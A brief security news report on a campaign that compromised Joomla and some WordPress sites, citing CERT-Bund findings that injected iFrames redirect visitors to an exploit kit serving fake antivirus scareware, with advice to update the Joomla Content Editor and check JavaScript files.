14 DAY TRIAL // A large number of Joomla websites, and some WordPress sites, have been compromised and set up to serve malware to visitors, mainly fake AVs (scareware).
Germany’s CERT-Bund researchers have investigated this cybercriminal campaign and, according to The H, they found that the attackers have injected iFrames into the hijacked sites to redirect users to an exploit kit via the Sutra Traffic Distribution System.
The initial infections were most likely achieved with the use of automated scripts that exploited known vulnerabilities in the Joomla Content Editor.
In this case, the crooks are making a profit via two channels. First they earn some money from the internauts who pay for the registration fees asked by the fake antivirus applications.
They also make some money by using the traffic redistribution systems detailed around one year ago by experts from Symantec.
Webmasters are advised to make sure that their Joomla Content Editor is updated to the latest version. Those who believe that they might have fallen victims to this campaign are advised to check their JavaScript files for suspicious iFrames.